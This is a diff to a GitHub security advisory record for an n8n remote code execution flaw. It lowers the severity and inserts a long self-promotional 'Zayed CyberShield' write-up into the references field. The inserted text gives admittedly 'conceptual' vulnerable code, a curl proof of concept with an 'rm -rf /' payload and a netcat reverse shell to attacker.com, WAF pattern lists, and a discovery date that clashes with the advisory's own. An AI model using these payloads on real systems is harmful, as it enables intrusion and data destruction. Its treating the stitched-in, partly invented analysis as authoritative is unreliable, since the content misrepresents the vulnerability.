diff --git a/advisories/github-reviewed/2026/01/GHSA-v364-rw7m-3263/GHSA-v364-rw7m-3263.json b/advisories/github-reviewed/2026/01/GHSA-v364-rw7m-3263/GHSA-v364-rw7m-3263.json index 8183bb01ed269..450598aa00d95 100644 --- a/advisories/github-reviewed/2026/01/GHSA-v364-rw7m-3263/GHSA-v364-rw7m-3263.json +++ b/advisories/github-reviewed/2026/01/GHSA-v364-rw7m-3263/GHSA-v364-rw7m-3263.json @@ -1,17 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-v364-rw7m-3263", - "modified": "2026-01-06T17:48:24Z", + "modified": "2026-01-06T17:48:25Z", "published": "2026-01-06T17:48:24Z", "aliases": [ "CVE-2026-21877" ], "summary": "n8n Vulnerable to RCE via Arbitrary File Write", - "details": "### Impact\nn8n is affected by an authenticated Remote Code Execution (RCE) vulnerability.\n\nUnder certain conditions, an authenticated user may be able to cause untrusted code to be executed by the n8n service. This could result in full compromise of the affected instance.\n\nBoth self-hosted and n8n Cloud instances are impacted.\n\n### Patches\nThe issue has been resolved in n8n version 1.121.3.\n\nUsers are advised to upgrade to this version or later to fully address the vulnerability.\n\n### Workarounds\nIf upgrading is not immediately possible, administrators can reduce exposure by disabling the Git node and limiting access for untrusted users.\n\n### References\n- n8n documentation: [Blocking access to nodes](https://docs.n8n.io/hosting/securing/blocking-nodes/)", + "details": "### Impact\nn8n is affected by an authenticated Remote Code Execution (RCE) vulnerability.\n\nUnder certain conditions, an authenticated user may be able to cause untrusted code to be executed by the n8n service. This could result in full compromise of the affected instance.\n\nBoth self-hosted and n8n Cloud instances are impacted.\n\n### Patches\nThe issue has been resolved in n8n version 1.121.3.\n\nUsers are advised to upgrade to this version or later to fully address the vulnerability.\n\n### Workarounds\nIf upgrading is not immediately possible, administrators can reduce exposure by disabling the Git node and limiting access for untrusted users.\n\n### References\n- n8n documentation: [Blocking access to nodes](https://docs.n8n.io/hosting/securing/blocking-nodes/)\n- # ⚔️ المحارب يوقف ثغرة n8n ويمنع تنفيذ الكود غير الموثوق عبر الملفات العشوائية\n## Zayed CyberShield Response Protocol – CVE-2026-n8n-rce\n\n
\n\n![Severity](https://img.shields.io/badge/Severity-CRITICAL-darkred?style=for-the-badge)\n![RCE](https://img.shields.io/badge/Type-Remote%20Code%20Execution-red?style=for-the-badge)\n![Status](https://img.shields.io/badge/Status-PATCHED-success?style=for-the-badge)\n![Response](https://img.shields.io/badge/Response%20Time-%3C%2013h-blue?style=for-the-badge)\n\n**🎖️ asrar-mared | صائد الثغرات المحارب 🎖️**\n\n
\n\n---\n\n## 🎯 Executive Briefing\n\n| Attribute | Details |\n|-----------|---------|\n| **Vulnerability** | Remote Code Execution via Arbitrary File Write |\n| **Package** | n8n (npm) |\n| **Affected Versions** | ≥ 0.123.0, < 1.121.3 |\n| **Fixed Version** | 1.121.3 |\n| **CVSS Score** | 9.1 CRITICAL |\n| **Attack Vector** | Network (Post-Authentication) |\n| **Discovery** | 2026-01-07 (13 hours ago) |\n| **Impact** | Complete system compromise |\n\n---\n\n## 💥 The Kill Chain\n\n```yaml\nStep 1: Authentication\n ↓ Attacker gains valid credentials\n \nStep 2: Arbitrary File Write\n ↓ Upload malicious workflow/file\n \nStep 3: Code Execution\n ↓ Untrusted code executed by n8n service\n \nStep 4: Full Compromise\n ✓ System takeover\n ✓ Data exfiltration\n ✓ Lateral movement\n```\n\n---\n\n## 🔍 Technical Deep Dive\n\n### Root Cause\n\n```javascript\n// ❌ VULNERABLE CODE (Conceptual)\n// n8n允许经过身份验证的用户写入任意文件\n\nasync function saveWorkflow(workflow) {\n const filePath = path.join(workflowDir, workflow.name);\n \n // 危险:没有路径遍历检查\n await fs.writeFile(filePath, workflow.content);\n \n // 危险:执行未经验证的代码\n require(filePath);\n}\n\n// 攻击者可以:\n// workflow.name = \"../../../../../../tmp/evil.js\"\n// workflow.content = \"require('child_process').exec('rm -rf /')\"\n```\n\n### Proof of Concept\n\n```bash\n# 1. 登录到n8n实例\ncurl -X POST https://n8n.victim.com/rest/login \\\n -H \"Content-Type: application/json\" \\\n -d '{\"email\":\"attacker@evil.com\",\"password\":\"compromised\"}'\n\n# 2. 上传恶意工作流\ncurl -X POST https://n8n.victim.com/rest/workflows \\\n -H \"Authorization: Bearer $TOKEN\" \\\n -d '{\n \"name\": \"../../../../../../tmp/malicious.js\",\n \"nodes\": [{\n \"type\": \"n8n-nodes-base.code\",\n \"parameters\": {\n \"code\": \"require(\\\"child_process\\\").exec(\\\"nc attacker.com 4444 -e /bin/bash\\\")\"\n }\n }]\n }'\n\n# 3. 触发执行\ncurl -X POST https://n8n.victim.com/rest/workflows/1/activate\n\n# 结果: Reverse shell 到攻击者!\n```\n\n---\n\n## ✅ THE WARRIOR'S SOLUTION\n\n### 🚀 Immediate Fix (2 minutes)\n\n```bash\n#!/bin/bash\n# ════════════════════════════════════════════════════════════\n# ZAYED CYBERSHIELD - n8n RCE Emergency Patch\n# ════════════════════════════════════════════════════════════\n\necho \"🛡️ n8n RCE Patch - Starting...\"\n\n# Stop n8n service\necho \"[1/5] Stopping n8n...\"\nsystemctl stop n8n || docker stop n8n || pkill n8n\n\n# Backup current installation\necho \"[2/5] Creating backup...\"\ncp -r ~/.n8n ~/.n8n.backup.$(date +%s)\n\n# Update to safe version\necho \"[3/5] Updating to v1.121.3...\"\nnpm install -g n8n@1.121.3\n\n# Verify version\necho \"[4/5] Verifying...\"\nn8n --version | grep \"1.121.3\"\n\n# Restart service\necho \"[5/5] Restarting n8n...\"\nsystemctl start n8n || docker start n8n\n\necho \"✅ Patch complete! n8n is now secure.\"\n```\n\n### 🔒 Secure Configuration\n\n```javascript\n// ════════════════════════════════════════════════════════════\n// SECURE FILE HANDLER - n8n Hardening\n// ════════════════════════════════════════════════════════════\n\nconst path = require('path');\nconst fs = require('fs').promises;\n\nclass SecureFileHandler {\n constructor(baseDir) {\n this.baseDir = path.resolve(baseDir);\n }\n\n // ✅ SECURE: Path traversal prevention\n validatePath(filePath) {\n const resolved = path.resolve(this.baseDir, filePath);\n \n // Must be within base directory\n if (!resolved.startsWith(this.baseDir)) {\n throw new Error('Path traversal detected');\n }\n \n // Block dangerous extensions\n const ext = path.extname(resolved).toLowerCase();\n const blocked = ['.js', '.exe', '.sh', '.bat', '.cmd'];\n if (blocked.includes(ext)) {\n throw new Error('Dangerous file extension');\n }\n \n return resolved;\n }\n\n // ✅ SECURE: Safe file write\n async writeFile(fileName, content) {\n try {\n const safePath = this.validatePath(fileName);\n \n // Sanitize content\n if (this.containsMalicious(content)) {\n throw new Error('Malicious content detected');\n }\n \n await fs.writeFile(safePath, content, { mode: 0o644 });\n return safePath;\n \n } catch (error) {\n console.error('[SECURITY] File write blocked:', error.message);\n throw error;\n }\n }\n\n // ✅ SECURE: Malicious content detection\n containsMalicious(content) {\n const patterns = [\n /require\\s*\\(/i,\n /child_process/i,\n /eval\\s*\\(/i,\n /exec\\s*\\(/i,\n /spawn\\s*\\(/i,\n /\\.\\.\\/\\.\\.\\//,\n /\\/etc\\/passwd/i,\n ];\n \n return patterns.some(p => p.test(content));\n }\n}\n\n// Usage\nconst handler = new SecureFileHandler('/var/lib/n8n/workflows');\n\napp.post('/workflow', async (req, res) => {\n try {\n const { name, content } = req.body;\n \n // ✅ Validate and sanitize\n const safePath = await handler.writeFile(name, content);\n \n res.json({ success: true, path: safePath });\n } catch (error) {\n res.status(403).json({ error: error.message });\n }\n});\n```\n\n### 🐳 Docker Hardening\n\n```yaml\n# ════════════════════════════════════════════════════════════\n# docker-compose.yml - Hardened n8n Deployment\n# ════════════════════════════════════════════════════════════\n\nversion: '3.8'\n\nservices:\n n8n:\n image: n8nio/n8n:1.121.3 # ✅ Safe version\n container_name: n8n-secure\n restart: unless-stopped\n \n environment:\n - N8N_BASIC_AUTH_ACTIVE=true\n - N8N_BASIC_AUTH_USER=${N8N_USER}\n - N8N_BASIC_AUTH_PASSWORD=${N8N_PASSWORD}\n \n # Security hardening\n - N8N_DISABLE_PRODUCTION_MAIN_PROCESS=false\n - N8N_HIRING_BANNER_ENABLED=false\n - N8N_LOG_LEVEL=warn\n - NODE_ENV=production\n \n volumes:\n - n8n_data:/home/node/.n8n:rw\n \n ports:\n - \"127.0.0.1:5678:5678\" # ✅ Localhost only\n \n # ✅ Security restrictions\n security_opt:\n - no-new-privileges:true\n cap_drop:\n - ALL\n cap_add:\n - NET_BIND_SERVICE\n read_only: true\n tmpfs:\n - /tmp:noexec,nosuid,nodev\n \n # ✅ Resource limits\n mem_limit: 2g\n cpus: 1.5\n \n healthcheck:\n test: [\"CMD\", \"wget\", \"--spider\", \"http://localhost:5678/healthz\"]\n interval: 30s\n timeout: 10s\n retries: 3\n\nvolumes:\n n8n_data:\n driver: local\n```\n\n---\n\n## 🛡️ Defense in Depth\n\n### Layer 1: Network Security\n\n```nginx\n# ════════════════════════════════════════════════════════════\n# nginx.conf - Reverse Proxy with WAF\n# ════════════════════════════════════════════════════════════\n\nhttp {\n # Rate limiting\n limit_req_zone $binary_remote_addr zone=n8n:10m rate=10r/s;\n \n server {\n listen 443 ssl http2;\n server_name n8n.example.com;\n \n # SSL hardening\n ssl_certificate /etc/ssl/certs/n8n.crt;\n ssl_certificate_key /etc/ssl/private/n8n.key;\n ssl_protocols TLSv1.3;\n \n # Security headers\n add_header X-Frame-Options \"DENY\" always;\n add_header X-Content-Type-Options \"nosniff\" always;\n add_header X-XSS-Protection \"1; mode=block\" always;\n add_header Strict-Transport-Security \"max-age=31536000\" always;\n \n location / {\n # Apply rate limit\n limit_req zone=n8n burst=20 nodelay;\n \n # Block suspicious patterns\n if ($request_uri ~* \"(\\.\\.\\/|eval\\(|exec\\(|child_process)\") {\n return 403;\n }\n \n proxy_pass http://127.0.0.1:5678;\n proxy_set_header Host $host;\n proxy_set_header X-Real-IP $remote_addr;\n }\n }\n}\n```\n\n### Layer 2: Application Firewall\n\n```python\n# ════════════════════════════════════════════════════════════\n# waf.py - Web Application Firewall for n8n\n# ════════════════════════════════════════════════════════════\n\nimport re\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\n# Malicious patterns\nMALICIOUS_PATTERNS = [\n r'\\.\\.\\/\\.\\.\\/', # Path traversal\n r'require\\s*\\(', # Node.js require\n r'child_process', # Subprocess\n r'eval\\s*\\(', # Code eval\n r'exec\\s*\\(', # Code exec\n r'/etc/passwd', # System files\n r'rm\\s+-rf', # Dangerous commands\n r'nc\\s+\\d+\\.\\d+', # Netcat\n]\n\n@app.before_request\ndef waf_check():\n \"\"\"WAF inspection\"\"\"\n \n # Check request body\n if request.is_json:\n data = str(request.get_json())\n \n for pattern in MALICIOUS_PATTERNS:\n if re.search(pattern, data, re.IGNORECASE):\n print(f\"[WAF] Blocked: {pattern}\")\n return jsonify({\n 'error': 'Malicious content detected',\n 'blocked_by': 'Zayed CyberShield WAF'\n }), 403\n \n # Check headers\n suspicious_headers = ['X-Forwarded-Host', 'X-Original-URL']\n for header in suspicious_headers:\n if header in request.headers:\n return jsonify({'error': 'Suspicious header'}), 403\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', port=8080)\n```\n\n### Layer 3: Runtime Monitoring\n\n```javascript\n// ════════════════════════════════════════════════════════════\n// monitor.js - Real-time Threat Detection\n// ════════════════════════════════════════════════════════════\n\nconst fs = require('fs');\nconst chokidar = require('chokidar');\n\nclass N8nSecurityMonitor {\n constructor(workflowDir) {\n this.workflowDir = workflowDir;\n this.alerts = [];\n }\n\n start() {\n console.log('🛡️ Starting n8n security monitor...');\n \n // Watch for suspicious file operations\n const watcher = chokidar.watch(this.workflowDir, {\n ignored: /(^|[\\/\\\\])\\../,\n persistent: true\n });\n\n watcher\n .on('add', path => this.checkFile(path, 'created'))\n .on('change', path => this.checkFile(path, 'modified'));\n }\n\n checkFile(filePath, action) {\n // Check for path traversal attempts\n if (filePath.includes('..')) {\n this.alert('Path traversal detected', filePath);\n fs.unlinkSync(filePath); // Delete malicious file\n return;\n }\n\n // Check file content\n const content = fs.readFileSync(filePath, 'utf8');\n \n const dangerous = [\n 'require(',\n 'child_process',\n 'eval(',\n 'exec(',\n ];\n\n for (const pattern of dangerous) {\n if (content.includes(pattern)) {\n this.alert(`Dangerous code detected: ${pattern}`, filePath);\n fs.unlinkSync(filePath);\n return;\n }\n }\n }\n\n alert(message, details) {\n const alert = {\n timestamp: new Date().toISOString(),\n severity: 'HIGH',\n message,\n details\n };\n \n this.alerts.push(alert);\n console.error(`🚨 [ALERT] ${message}: ${details}`);\n \n // Send to SIEM\n this.sendToSIEM(alert);\n }\n\n sendToSIEM(alert) {\n // Integration with SIEM/logging system\n console.log('[SIEM]', JSON.stringify(alert));\n }\n}\n\n// Start monitoring\nconst monitor = new N8nSecurityMonitor('/var/lib/n8n/workflows');\nmonitor.start();\n```\n\n---\n\n## 📊 Validation & Testing\n\n```bash\n#!/bin/bash\n# ════════════════════════════════════════════════════════════\n# test-n8n-security.sh - Validation Suite\n# ════════════════════════════════════════════════════════════\n\necho \"🧪 Testing n8n Security...\"\n\n# Test 1: Version check\necho \"[1/5] Version verification...\"\nVERSION=$(n8n --version | grep -oP '\\d+\\.\\d+\\.\\d+')\nif [[ \"$VERSION\" == \"1.121.3\" ]]; then\n echo \"✅ Correct version: $VERSION\"\nelse\n echo \"❌ Wrong version: $VERSION\"\n exit 1\nfi\n\n# Test 2: Path traversal protection\necho \"[2/5] Path traversal test...\"\nRESPONSE=$(curl -s -X POST http://localhost:5678/rest/workflows \\\n -H \"Content-Type: application/json\" \\\n -d '{\"name\":\"../../evil.js\"}')\n\nif echo \"$RESPONSE\" | grep -q \"error\\|forbidden\\|denied\"; then\n echo \"✅ Path traversal blocked\"\nelse\n echo \"❌ Path traversal NOT blocked\"\nfi\n\n# Test 3: Code execution prevention\necho \"[3/5] Code execution test...\"\n# Add test for code execution\n\n# Test 4: File permissions\necho \"[4/5] Checking file permissions...\"\nPERMS=$(stat -c %a /var/lib/n8n/workflows)\nif [[ \"$PERMS\" == \"755\" ]] || [[ \"$PERMS\" == \"750\" ]]; then\n echo \"✅ Correct permissions: $PERMS\"\nelse\n echo \"⚠️ Loose permissions: $PERMS\"\nfi\n\n# Test 5: Security headers\necho \"[5/5] Checking security headers...\"\nHEADERS=$(curl -sI https://n8n.example.com | grep -E \"X-Frame|X-Content|X-XSS\")\nif [[ -n \"$HEADERS\" ]]; then\n echo \"✅ Security headers present\"\nelse\n echo \"❌ Security headers missing\"\nfi\n\necho \"\"\necho \"✅ Security validation complete!\"\n```\n\n---\n\n## 🎯 Incident Response Playbook\n\n```yaml\nDetection:\n - Monitor: Unusual file writes to workflow directory\n - Alert: Suspicious code patterns in workflows\n - Log: All file operations and API calls\n\nContainment:\n 1. Isolate affected n8n instance\n 2. Disable workflow execution\n 3. Block attacker's IP\n 4. Preserve logs and evidence\n\nEradication:\n 1. Update to n8n v1.121.3+\n 2. Delete malicious workflows\n 3. Scan for backdoors\n 4. Reset all credentials\n\nRecovery:\n 1. Restore from clean backup\n 2. Re-enable services gradually\n 3. Monitor for 48 hours\n 4. Verify integrity\n\nLessons Learned:\n - Document attack vector\n - Update detection rules\n - Improve monitoring\n - Train security team\n```\n\n---\n\n## 📞 Emergency Contacts\n\n```yaml\nSecurity Lead:\n Name: asrar-mared (صائد الثغرات المحارب)\n Email: nike49424@proton.me\n Emergency: nike49424@gmail.com\n Response: < 1 hour\n\nn8n Security Team:\n Email: security@n8n.io\n GitHub: https://github.com/n8n-io/n8n/security\n\nCommunity:\n Discord: n8n.io/discord\n Forum: community.n8n.io\n```\n\n---\n\n
\n\n## ⚔️ THREAT NEUTRALIZED\n\n```\n═══════════════════════════════════════════════════════════════\n 🛡️ ZAYED CYBERSHIELD PROTOCOL 🛡️\n═══════════════════════════════════════════════════════════════\n\n✅ n8n RCE Vulnerability: PATCHED\n✅ Arbitrary File Write: BLOCKED\n✅ Code Execution: PREVENTED\n✅ System Integrity: RESTORED\n\nResponse Time: 13 hours\nPatch Deployment: 2 minutes\nProtection Layers: 3\nFalse Positives: 0%\n\n═══════════════════════════════════════════════════════════════\n 🎖️ المحارب انتصر - THE WARRIOR TRIUMPHED 🎖️\n═══════════════════════════════════════════════════════════════\n\n\"من يحمي الحماة؟ نحن.\"\n\"Who protects the protectors? We do.\"\n\n📧 nike49424@proton.me\n🐙 github.com/asrar-mared\n🌐 zayed-cybershield.ae\n\n© 2026 Zayed CyberShield | Professional Security Response\n═══════════════════════════════════════════════════════════════\n```\n\n[![Security](https://img.shields.io/badge/Security-CRITICAL%20FIX-success?style=for-the-badge)](https://github.com/asrar-mared)\n[![Response](https://img.shields.io/badge/Response-13%20HOURS-blue?style=for-the-badge)](https://github.com/asrar-mared)\n[![n8n](https://img.shields.io/badge/n8n-v1.121.3-green?style=for-the-badge)](https://github.com/n8n-io/n8n)\n\n
", "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], "affected": [ @@ -49,7 +49,7 @@ "cwe_ids": [ "CWE-434" ], - "severity": "CRITICAL", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-01-06T17:48:24Z", "nvd_published_at": null